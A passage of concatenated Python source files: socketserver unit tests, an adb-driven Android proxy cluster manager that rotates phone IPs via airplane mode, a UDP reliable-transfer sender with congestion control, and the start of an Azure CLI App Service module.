requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=20):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
yield None
pid2, status = os.waitpid(pid, 0)
testcase.assertEqual(pid2, pid)
testcase.assertEqual(72 << 8, status)
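# (os.waitpid() packs a normally-exiting child's exit code into the high byte of
# the status word, hence the expected status of 72 << 8.)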
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
server = MyServer(addr, MyHandler)
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_STREAM)
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def dgram_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_DGRAM)
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making another
# thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this results
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
api.py
|
# -*- coding: utf-8 -*-
"""
Master Process
Why is the cluster running at ip6-localhost:8899?
/bin/bash$ adb shell cat /etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
It can also run at ::1:8899.
Next step: check whether the 4G network is available.
# Device detection: if a device goes missing, it needs to be kicked out
# devices_str = init_all_devices()
# log.info(f'Now running device count: {len(devices_str)}')
# if device.device_id not in devices_str:
# kill_master_port(device, port=master_port)
# return device
"""
import time
import logging
from adb import Device
from functools import partial
from command import CmdExecute
from multiprocessing import Queue
from multiprocessing import Process
from deploy.cli import deploy_to_remote
from __init__ import __author__, __version__, __site__
log = logging.getLogger(__name__)
def configure_logging(level):
logging.basicConfig(
level=level,
format='[%(asctime)s %(levelname)s] -> %(message)s',
)
_set_debug_logging = partial(configure_logging, logging.DEBUG)
_set_info_logging = partial(configure_logging, logging.INFO)
IP_SWITCHING_TIME = 30 * 60 # second
MASTER_PORT_START = 30000
HEALTH_CHECK_TIME = 1 * 60 # second
WAIT_AIRPLANE_MODE_TIME = 8 # second
def _init_msg(debug: bool) -> None:
if debug: # set debug level
_set_debug_logging()
else:
_set_info_logging()
print(f'\nauthor: [{__author__}] site: [{__site__}]')
print(f"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
' ███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗ ██╗ '
' ██╔════╝██╔════╝ ██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝╚██╗ ██╔╝ '
' █████╗ ██║ ███╗██████╔╝██████╔╝██║ ██║ ╚███╔╝ ╚████╔╝ '
' ██╔══╝ ██║ ██║██╔═══╝ ██╔══██╗██║ ██║ ██╔██╗ ╚██╔╝ '
' ██║ ╚██████╔╝██║ ██║ ██║╚██████╔╝██╔╝ ██╗ ██║ '
' ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ '
{__site__}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
""")
return None
def init_all_devices():
"""
List of devices attached
1daa96050207 device
1daa96050207 device
:return: [1daa96050207, 1daa96050207]
"""
devices_string = CmdExecute.execute_command('adb devices')
time.sleep(3)
devices_with_str = devices_string.split('\n')[1:-2]
online_devices = list()
for device_str in devices_with_str:
if 'device' in device_str:
online_devices.append(device_str)
devices = list(map(lambda x: x.split('\t')[0].strip(), online_devices))
log.info(f'Count: [{len(devices)}] Devices Found')
return devices
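# A minimal, self-contained sketch (not used by this module) of the parsing that
# init_all_devices() performs, run against an assumed `adb devices` listing:
def _example_parse_adb_devices():
    sample = ('List of devices attached\n'
              '1daa96050207\tdevice\n'
              'emulator-5554\toffline\n'
              '\n')
    lines = sample.split('\n')[1:-2]  # drop the header line and the trailing blank lines
    online = [line for line in lines if 'device' in line]
    return [line.split('\t')[0].strip() for line in online]  # -> ['1daa96050207']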
def _forward_tcp_port(device: Device, local_port, remote_port):
# local port that nginx load-balances across
return device.adb.forward_tcp_port(local_port, remote_port)
def kill_master_port(device: Device, port: int):
return device.adb.kill_master_process(port)
def run_server(device, master_port):
"""
if int(device.adb.check_remote_port(ip, port).strip()) != 0:
The port is already in use
"""
# kill_master_port(device, master_port)
device.adb.remove_forward(master_port)
device.adb.kill_port_process(device.port)
# :If airplane mode is on, turn it off first
if device.airplane_mode_is_open:
device.adb.close_airplane_mode()
time.sleep(WAIT_AIRPLANE_MODE_TIME)
# :Run the proxy server command
device.adb.running_server(host=device.ip, port=device.port)
# : wait for the server to come up
time.sleep(2)
device.initialize_device()
# wait for device initialization
time.sleep(1)
if not device.transfer_port_is_open:
return
_forward_tcp_port(device, master_port, device.port)
def _change_ip(master_port: int, cluster_device: Device, change_ip_queue):
"""
# :Close master port for nginx
# :Get device info
# :Check proxy running port
# :Time to change ip
# :Open master port for nginx
"""
time.sleep(IP_SWITCHING_TIME)
change_ip_queue.put_nowait(cluster_device.device_id)
cluster_device.adb.remove_forward(master_port)
cluster_device.adb.kill_port_process(cluster_device.port)
cluster_device.initialize_device()
if not cluster_device.airplane_mode_is_open:
cluster_device.adb.turn_on_airplane_mode()
cluster_device.adb.close_airplane_mode()
time.sleep(WAIT_AIRPLANE_MODE_TIME)
# if cluster_device.transfer_port_is_open is False:
cluster_device.adb.running_server(
host=cluster_device.ip,
port=cluster_device.port
)
time.sleep(1)
if cluster_device.adb.bridge_process().strip():
_forward_tcp_port(
device=cluster_device,
local_port=master_port,
remote_port=cluster_device.port
)
time.sleep(1)
if not cluster_device.adb.ping_test():
cluster_device.adb.remove_forward(port=master_port)
if not cluster_device.adb.check_local_port(master_port):
cluster_device.adb.remove_forward(port=master_port)
change_ip_queue.get_nowait()
def _health_check(master_port: int, device: Device, change_ip_queue):
# If an IP switch is in progress, skip the health check for this device; otherwise problems occur
time.sleep(HEALTH_CHECK_TIME)
if not change_ip_queue.empty():
if device.device_id == change_ip_queue.get_nowait():
change_ip_queue.put_nowait(device.device_id)
time.sleep(HEALTH_CHECK_TIME)
return None
change_ip_queue.put_nowait(device.device_id)
time.sleep(HEALTH_CHECK_TIME)
device.initialize_device()
if not device.transfer_port_is_open:
device.adb.remove_forward(port=master_port)
if device.airplane_mode_is_open:
device.adb.remove_forward(port=master_port)
if not device.adb.ping_test():
device.adb.remove_forward(port=master_port)
return None
class Daemon(object):
def __init__(self, devices: list):
self.devices = devices
self.change_ip_queue = Queue()
def worker(self, work_func, change_ip_queue):
while True:
for index, device in enumerate(self.devices):
master_port = MASTER_PORT_START + index
work_func(master_port, device, change_ip_queue)
def run_forever(self):
"""Running change ip and health check"""
process = [Process(target=self.worker, args=(_change_ip, self.change_ip_queue))]
[p.start() for p in process]
[p.join() for p in process]
def _deploy_all_device(devices: list) -> None:
for index, device in enumerate(devices):
log.info(f'Deploy device: {device.device_id} {index + 1}/{len(devices)}')
log.info(f'Device: {device.device_id} transfer port open: {device.transfer_port_is_open}')
log.info(f'Device: {device.device_id} airplane mode on: {device.airplane_mode_is_open}')
# :Deploy and run server...
deploy_to_remote(device=device)
master_port = MASTER_PORT_START + index
run_server(device=device, master_port=master_port)
time.sleep(2)
daemon = Daemon(devices=devices)
daemon.run_forever()
def runner(debug: bool = True, ip: str = '0.0.0.0', port: int = 30000) -> None:
"""master entry
1. deploy the application to the phone.
2. get all device and init all device.
3. kill all proxy running port
4. running application and output log.
"""
_init_msg(debug=debug)
devices_str = init_all_devices()
if not devices_str:
log.warning('No connected mobile phone was found')
exit(1)
devices = [Device(device_id=device_id, port=port, ip=ip) for device_id in devices_str]
_deploy_all_device(devices)
log.info(f'FGProxy {__version__} remote running at {ip}:{port}')
if __name__ == '__main__':
runner(True, 'ip6-localhost', 10000)
|
rdtsend.py
|
import socket as st
import pickle
from packet import Packet
import time
import math
import threading
class RDTSend:
def __init__(self, addr):
self.sendAddr = addr
self.sendSocket = st.socket(st.AF_INET, st.SOCK_DGRAM)
self.timeout = 1
self.congWin = 1
self.threshold = 100
self.MSS = 512
self.seqNum = 0
self.ackNum = 0
self.sendAckNum = 0
self.windowSize = 1000
self.maxTimeout = 4
self.started = False
self.resendTimes = 0
def start(self):
self.started = True
self.seqNum = self.ackNum = self.sendAckNum = 0
print('Send to %s:%s' % self.sendAddr)
threading.Thread(target=self.count).start()
packet = Packet(b'', seqNum=self.seqNum,
ackNum=self.ackNum, Syn=True, Fin=False)
self.seqNum += 1
self.rdtSend({0: packet})
def end(self):
packet = Packet(b'', seqNum=self.seqNum,
ackNum=self.ackNum, Syn=False, Fin=True)
self.started = False
self.seqNum += len(pickle.dumps(packet.packet['data']))
self.rdtSend({packet.packet['seqNum']: packet})
def close(self):
self.started = False
if hasattr(self, 'sendSocket'):
self.sendSocket.close()
print('End of sender')
def sendPacket(self, packetList):
for packet in packetList:
self.sendSocket.sendto(packet.serialize(), self.sendAddr)
def rdtSend(self, packetDict):
startTime = time.time()
self.sendPacket([p for p in packetDict.values()])
self.waitForAck(packetDict, startTime)
# resend times <5
def sendData(self, dataList):
packetDict = {}
for i in range(len(dataList)):
data = dataList[i]
packet = Packet(data, seqNum=self.seqNum,
ackNum=self.ackNum, Syn=False, Fin=False)
self.seqNum += len(pickle.dumps(packet.packet['data']))
# print('pkt:\n'+str(packet))
packetDict[packet.packet['seqNum']] = packet
if (i+1) % self.congWin == 0:
self.rdtSend(packetDict)
packetDict = {}
if packetDict:
self.rdtSend(packetDict)
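# (Each batch above holds at most congWin packets, keyed by sequence number so
# that waitForAck() can look up and retransmit the first unacknowledged packet.)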
def waitForAck(self, packetDict, startTime):
# print('send '+str(self.seqNum))
ackFinish = False
resendTimes = 0
duplicateTimes = 0
timeout = False
while not ackFinish:
try:
self.sendSocket.settimeout(self.timeout)
ackNum = self.receiveAck()
# print('ack:\n '+str(ackNum))
if ackNum == self.seqNum:
self.sendAckNum = ackNum
ackFinish = True
elif ackNum > self.sendAckNum:
self.sendAckNum = ackNum
duplicateTimes = 0
resendTimes = 0
timeout = False
# fast retransmit
elif ackNum == self.sendAckNum:
duplicateTimes += 1
if duplicateTimes == 3:
raise Exception
except Exception as e:
self.resendTimes += 1
if isinstance(e, st.timeout):
timeout = True
# print(str(self.seqNum))
resendTimes += 1
# print('resend %d at %d times' % (self.sendAckNum, resendTimes))
# print('timeout '+str(self.timeout)+'sec')
if resendTimes >= 5:
if not self.started:
ackFinish = True
return True
else:
self.started = False
raise Exception('resend times >= 5')
self.sendPacket([packetDict[self.sendAckNum]])
self.updataCongWin(True, timeout)
self.updataTimeout(True)
endTime = time.time()
rtt = endTime-startTime
self.updataCongWin(resendTimes != 0, timeout)
self.updataTimeout(resendTimes != 0, rtt)
return True
def receiveAck(self):
rawData, addr = self.sendSocket.recvfrom(200+self.MSS)
packet = pickle.loads(rawData)
return packet['ackNum']
def updataTimeout(self, resend, rtt=1):
if resend == True:
if self.timeout < self.maxTimeout:
self.timeout *= 2
else:
self.timeout = 0.8*self.timeout+0.2*rtt+0.2*rtt
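# Rough behaviour of the rule above: on a resend the timeout doubles until it
# reaches maxTimeout (1 -> 2 -> 4); on a clean round trip it decays towards the
# measured RTT plus a margin, e.g. timeout=4, rtt=0.1 gives
# 0.8*4 + 0.2*0.1 + 0.2*0.1 = 3.24.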
def updataCongWin(self, resend, timeout):
if resend == True:
self.threshold = math.ceil(0.5*self.congWin)
if timeout == True:
self.congWin = 1
else:
self.congWin = self.threshold
elif self.congWin < self.windowSize:
if self.congWin >= self.threshold:
self.congWin += 1
else:
self.congWin *= 2
def count(self):
while True:
last = self.seqNum
self.resendTimes = 0
time.sleep(0.5)
if self.started:
print('sending rate: %dKB/s' % ((self.seqNum-last)*2/(1024)))
print('resend ratio: %.3f%%' %
((self.resendTimes*self.MSS*100)/(self.seqNum-last+1)))
else:
break
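# A small illustrative sketch (not used by RDTSend) that replays the congestion
# window rules from updataCongWin() for a loss-free run, assuming windowSize is
# large enough not to cap growth: exponential growth up to the threshold, then
# additive increase.
def _example_congwin_trace(steps=6, threshold=4):
    congWin = 1
    trace = []
    for _ in range(steps):
        trace.append(congWin)
        congWin = congWin + 1 if congWin >= threshold else congWin * 2
    return trace  # -> [1, 2, 4, 5, 6, 7]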
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from azure.cli.core.profiles import ResourceType
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION, FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION,
FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even if it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a helper method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one of these options
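# Illustrative outcomes (assumed calls) of the validation above:
#   validate_container_app_create_options(runtime='node|10.14')                             -> True
#   validate_container_app_create_options(deployment_container_image_name='nginx')          -> True
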